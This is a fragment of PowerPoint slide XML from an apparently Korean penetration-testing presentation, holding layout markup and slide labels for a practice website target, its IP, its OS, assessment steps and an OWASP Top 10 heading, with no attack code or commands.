                <a:rPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" spc="-500" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000">
                      <a:alpha val="70196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</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" sz="2200" b="0" i="0" u="none" strike="noStrike" spc="-5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3371BAB-DC07-43DA-BA2C-85EF1DB560E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10033000" y="5549900"/>
              <a:ext cx="2870200" cy="622300"/>
              <a:chOff x="10058400" y="6680200"/>
              <a:chExt cx="2870200" cy="622300"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="TextBox 39"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10058400" y="6997700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en-US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Pretendard Medium"/>
                  </a:rPr>
                  <a:t>192.168.5.160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ea typeface="Pretendard Medium"/>
                </a:endParaRPr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10521950" y="6680200"/>
                <a:ext cx="18796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ko-KR" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" spc="-400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="44CCE5"/>
                    </a:solidFill>
                    <a:ea typeface="S-Core Dream 5 Medium"/>
                  </a:rPr>
                  <a:t>대상  </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="2000" spc="-400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="44CCE5"/>
                    </a:solidFill>
                    <a:ea typeface="S-Core Dream 5 Medium"/>
                  </a:rPr>
                  <a:t>아이피</a:t>
                </a:r>
                <a:endParaRPr lang="ko-KR" sz="2000" b="0" i="0" u="none" strike="noStrike" spc="-400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="44CCE5"/>
                  </a:solidFill>
                  <a:ea typeface="S-Core Dream 5 Medium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77D078-0DB6-4C11-A99B-169886EFA96A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9870440" y="6388100"/>
              <a:ext cx="3157220" cy="649356"/>
              <a:chOff x="9988550" y="7543800"/>
              <a:chExt cx="2870200" cy="649356"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="41" name="TextBox 41"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9988550" y="7888356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ko-KR" altLang="en-US" sz="1700" spc="-100" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="000000">
                        <a:alpha val="58824"/>
                      </a:srgbClr>
                    </a:solidFill>
                    <a:latin typeface="Pretendard Medium" panose="020B0600000101010101" charset="-127"/>
                    <a:ea typeface="Pretendard Medium" panose="020B0600000101010101" charset="-127"/>
                  </a:rPr>
                  <a:t>모의해킹</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US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Pretendard Medium" panose="020B0600000101010101" charset="-127"/>
                    <a:ea typeface="Pretendard Medium" panose="020B0600000101010101" charset="-127"/>
                  </a:rPr>
                  <a:t> 연습 웹사이트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endParaRPr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10058400" y="7543800"/>
                <a:ext cx="26670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ko-KR" altLang="en-US" sz="2000" spc="-400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="44CCE5"/>
                    </a:solidFill>
                    <a:ea typeface="S-Core Dream 5 Medium"/>
                  </a:rPr>
                  <a:t>서비스 종류</a:t>
                </a:r>
                <a:endParaRPr lang="ko-KR" sz="2000" b="0" i="0" u="none" strike="noStrike" spc="-400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="44CCE5"/>
                  </a:solidFill>
                  <a:ea typeface="S-Core Dream 5 Medium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3B204F7-9942-4DA2-94D8-7D683F27DB36}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10010775" y="7139056"/>
              <a:ext cx="2870200" cy="595244"/>
              <a:chOff x="10010775" y="8320156"/>
              <a:chExt cx="2870200" cy="595244"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="43" name="TextBox 41">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6761D11E-44E1-41BD-B8D9-F1E052B0030A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10010775" y="8610600"/>
                <a:ext cx="2870200" cy="3048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5449"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR" sz="1700" b="0" i="0" u="none" strike="noStrike" spc="-100" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000">
                        <a:alpha val="58824"/>
                      </a:srgbClr>
                    </a:solidFill>
                    <a:latin typeface="Pretendard Medium" panose="020B0600000101010101" charset="-127"/>
                    <a:ea typeface="Pretendard Medium" panose="020B0600000101010101" charset="-127"/>
                  </a:rPr>
                  <a:t>Linux</a:t>
                </a:r>
                <a:endParaRPr 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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="TextBox 42">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DE52550-AB5A-4643-BD84-BCE0F897F1FE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10483850" y="8320156"/>
                <a:ext cx="1879600" cy="3556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83830"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR" sz="2000" spc="-400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="44CCE5"/>
                    </a:solidFill>
                    <a:latin typeface="Pretendard Bold" panose="020B0600000101010101" charset="-127"/>
                    <a:ea typeface="Pretendard Bold" panose="020B0600000101010101" charset="-127"/>
                  </a:rPr>
                  <a:t>O         S</a:t>
                </a:r>
                <a:endParaRPr lang="ko-KR" sz="2000" b="0" i="0" u="none" strike="noStrike" spc="-400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="44CCE5"/>
                  </a:solidFill>
                  <a:latin typeface="Pretendard Bold" panose="020B0600000101010101" charset="-127"/>
                  <a:ea typeface="Pretendard Bold" panose="020B0600000101010101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A6F7CF-A843-46B8-A91E-1B509A9698A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13474700" y="1866900"/>
            <a:ext cx="3524250" cy="6197600"/>
            <a:chOff x="13474700" y="1866900"/>
            <a:chExt cx="3524250" cy="61976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74700" y="1866900"/>
              <a:ext cx="3479800" cy="6197600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:outerShdw blurRad="105249" dist="133665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39800" y="2019300"/>
              <a:ext cx="3162300" cy="9779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4020800" y="2317750"/>
              <a:ext cx="2387600" cy="457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6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점검과정</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" sz="2600" b="0" i="0" u="none" strike="noStrike" spc="-500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="S-Core Dream 5 Medium"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50" name="Picture 2" descr="C:\Users\Administrator\Downloads\free-icon-info-2165090.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC2128D3-9DEA-4841-9EBF-D4C47376D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0744" y="3273238"/>
              <a:ext cx="775945" cy="85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" descr="C:\Users\Administrator\Downloads\free-icon-report-1055644.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC90BD5C-DA1F-4DA8-893D-5404BEED6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2200" y="6016345"/>
              <a:ext cx="694266" cy="69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C:\Users\Administrator\Downloads\free-icon-target-3214721.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8055DD33-9409-40E1-B98E-47E450A45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0744" y="5076743"/>
              <a:ext cx="694266" cy="65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9" descr="C:\Users\Administrator\Downloads\free-icon-plan-1373009.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{590C3200-339C-4017-A07E-768D3F5A5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8160" y="4234392"/>
              <a:ext cx="635631" cy="635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1" descr="C:\Users\Administrator\Downloads\free-icon-presentation-858069.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF5B9157-09A6-49AA-BD76-EFC656872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848" y="6983245"/>
              <a:ext cx="724058" cy="72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39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4996F15D-5ACD-4032-8D47-732DBD4298DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14109700" y="347448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진단대상 정보 수집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2" name="TextBox 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9481ADC-331B-4130-A8F5-DB572A5113DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14084300" y="4369829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예상 취약점 정리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3" name="TextBox 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA66F1C3-F2B6-49F3-AB57-B7598DF74BB4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14128750" y="6153964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위험도 평가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4" name="TextBox 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39240330-2C39-47A1-9941-5CCCD16B23E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14122400" y="7139056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취약점 상세분석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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="TextBox 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04156E02-1792-4A35-A47B-6A381F5C9FB9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14055408" y="5252265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>
                  <a:solidFill>
                    <a:srgbClr val="000000">
                      <a:alpha val="58824"/>
                    </a:srgbClr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점검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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55CC3BEC-2893-42B6-B26C-022901A8F14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24350" y="-1125076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5054600" y="5130800"/>
            <a:ext cx="8191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333500" y="5143500"/>
            <a:ext cx="15621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F356E8-2C6B-4D33-BD3E-B200F5ED4492}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6527800" y="2527300"/>
            <a:ext cx="5245100" cy="5232400"/>
            <a:chOff x="6527800" y="2527300"/>
            <a:chExt cx="5245100" cy="5232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400" y="2032000"/>
            <a:ext cx="2260600" cy="2019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391400" y="40386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FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="S-Core Dream 7 ExtraBold"/>
              </a:rPr>
              <a:t>O W A  S  P </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" sz="6800" b="0" i="0" u="none" strike="noStrike" spc="-1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ea typeface="S-Core Dream 7 ExtraBold"/>
            </a:endParaRPr>
          </a:p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T O P  10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39100" y="6157384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b="0" i="0" u="none" strike="noStrike" spc="300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3958E3">
                    <a:alpha val="63922"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerabilities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3800" y="6350000"/>
            <a:ext cx="3187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endParaRPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" spc="-100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="47843"/>
                </a:srgb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8C96D8-7D5F-4D2C-B407-915742597705}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="708856" y="336841"/>
            <a:ext cx="6644444" cy="1207030"/>
            <a:chOff x="708856" y="336841"/>
            <a:chExt cx="6644444" cy="120703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BDF736-8DCB-440A-8FD6-FDCDF96F2F2E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="708856" y="362351"/>
              <a:ext cx="6072353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50B27C5-10D7-4E47-BF6E-4710D7137757}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6417671" y="336841"/>
              <a:ext cx="935629" cy="1207030"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F0F9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E8567F-6C06-424A-B96B-37514820E9D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6387531" y="263250"/>
            <a:ext cx="1329343" cy="1326124"/>
            <a:chOff x="6527800" y="2527300"/>
            <a:chExt cx="5245100" cy="5232400"/>
          </a:xfrm>
        </p:grpSpPr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72D7E42E-F437-4D41-9B2D-7D3AC75A6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A08EC9FB-44B9-4306-846F-03E74F068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750CC-FA4F-468E-9C09-55C122E8BA4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="696731" y="4518548"/>
            <a:ext cx="4302641" cy="1207030"/>
            <a:chOff x="696731" y="4518548"/>
            <a:chExt cx="4302641" cy="120703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5CE7A86-5195-489B-84C0-66CFF4CCBF4B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="696731" y="4529694"/>
              <a:ext cx="3730355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B566091-CCC5-47B4-8F95-ED641A90B401}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4001827" y="4518548"/>
              <a:ext cx="997545" cy="1207030"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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580759-7AB7-4F3B-82F8-7F15A16B9D7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4110528" y="4464050"/>
            <a:ext cx="1329343" cy="1326124"/>
            <a:chOff x="4110528" y="4464050"/>
            <a:chExt cx="1329343" cy="1326124"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="93" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4624EBF-6BBA-4A19-85A0-8D4E02E77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0528" y="4464050"/>
              <a:ext cx="1329343" cy="1326124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4" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65DAAB06-FCB5-4E17-8D29-F51A658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1684" y="4525206"/>
              <a:ext cx="1207031" cy="1207030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08CCB8B-EDFC-416A-BF1C-324B230AFC4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="702841" y="6538156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77D0473-4F47-4A98-B4C7-DC9503277D36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638636-2A6A-4CC6-8AAD-D42AF5102490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1A4FDF2-D7E3-49AC-8E3E-E0F768F29801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4841157" y="6469624"/>
            <a:ext cx="1329343" cy="1326124"/>
            <a:chOff x="6527800" y="2527300"/>
            <a:chExt cx="5245100" cy="5232400"/>
          </a:xfrm>
        </p:grpSpPr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C3FC8797-4D99-4828-9DD0-A6577B41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82" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{283A96F3-1BE1-427C-BBA6-F3F0312FD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5CC1B65-8C9C-4EE5-AA81-3D6FA84377A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="696731" y="8340270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B8B1F50-99D0-4305-8AF4-F7D25A0B133C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A31C9B69-9702-4786-861C-0FDBD63712B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A0CDE3D-DC76-44F7-80F1-8236603938CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6327907" y="8266748"/>
            <a:ext cx="1329343" cy="1326124"/>
            <a:chOff x="6527800" y="2527300"/>
            <a:chExt cx="5245100" cy="5232400"/>
          </a:xfrm>
        </p:grpSpPr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D23A3BDA-D8F0-441B-B8AA-6A16E3B89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7" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{954FFD5B-F6F3-4C75-B7B6-A0A9542E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120DAD8-21B4-4214-8C0C-9355BB2E0E55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="11001448" y="8355294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045F5D9-06A2-45AB-B6B2-8D87721C4A2F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C4924E9-9BA4-4254-B2A1-169ACC22746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337B1F4-2FB6-4C8B-B834-1E3BE290B14E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="10433563" y="8309791"/>
            <a:ext cx="1329343" cy="1326124"/>
            <a:chOff x="6527800" y="2527300"/>
            <a:chExt cx="5245100" cy="5232400"/>
          </a:xfrm>
        </p:grpSpPr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CD55D78A-1A23-44E7-872E-ED6824AAD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17" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5723851E-40AE-4967-8F59-A6E70067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EBDA74C-3780-4A4F-8F91-BC893FEC94E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="12491733" y="6393523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DE20CAD-8A61-45F1-B0B3-3D4B8376A85B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2B044B3-050A-47CC-A8B7-43742054C5F7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1C7F148-2D79-495B-A10E-88E11C7DC9AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="11914737" y="6335585"/>
            <a:ext cx="1329343" cy="1326124"/>
            <a:chOff x="6527800" y="2527300"/>
            <a:chExt cx="5245100" cy="5232400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="122" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC9FE639-E1FE-4A88-93CC-8E4972E8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3" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68C97263-FCC2-4AAA-B2F1-5C3B47F56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12BA2D8-BF78-4E47-96EE-135D8CD17968}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="13151065" y="4173587"/>
            <a:ext cx="4302641" cy="1207030"/>
            <a:chOff x="708857" y="4547985"/>
            <a:chExt cx="4302641" cy="1207030"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="7BDAED"/>
          </a:solidFill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2CC768E-3878-4A6B-955B-CBE84FD76993}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="708857" y="4559131"/>
              <a:ext cx="373035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F3DA84D-2E9E-4603-836A-8A4061DC95BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4013953" y="4547985"/>
              <a:ext cx="997545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EFC28ED-76EF-486F-B6A2-4FDEF66C2347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="12710566" y="4108991"/>
            <a:ext cx="1329343" cy="1326124"/>
            <a:chOff x="6527800" y="2527300"/>
            <a:chExt cx="5245100" cy="5232400"/>
          </a:xfrm>
        </p:grpSpPr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99C7EF84-265F-43C2-ABFA-70E13C33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9" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40F21CE7-245A-4CD9-9ED4-1621CDD15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CD82196-6AE8-4EFD-884C-77167F9434F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="12497749" y="2153979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93487FF-38B0-4728-975B-1FF0AE7E6A6D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06667B8-622C-4682-AB55-30FFEB8347F1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98169EB-03D2-4EE9-A458-BDFD154EF543}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="11979937" y="2103417"/>
            <a:ext cx="1329343" cy="1326124"/>
            <a:chOff x="6527800" y="2527300"/>
            <a:chExt cx="5245100" cy="5232400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="134" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C34AF4FD-EEBA-4D6B-B894-9B3BE288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35" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27537672-8EDE-4624-AEA2-DB576842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25A21F4-0987-4F12-8AB3-092F1CB355C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="11013574" y="351865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D201D55-4098-4293-BBD1-1D06EF411C99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AA458F88-C12A-441A-BD20-A9B41F29ED2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F5A5777-8674-48B2-B88B-6F18D41933F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="10493187" y="306293"/>
            <a:ext cx="1329343" cy="1326124"/>
            <a:chOff x="6527800" y="2527300"/>
            <a:chExt cx="5245100" cy="5232400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="140" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CF0E5C0-81C7-44AE-AE6F-1FA5A2E37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41" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01EB679B-0D5A-4C32-BA60-E874626E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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="144" name="표 143">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CA23E6B-8343-4A37-9929-D3DD620D7F9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365073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671833"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="145" name="표 144">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7661962-0EFE-4928-B0F4-2C3505658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21354"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="818169" y="662423"/>
          <a:ext cx="4233276" cy="579120"/>
        </p:xfrm>
        <a:graphic>
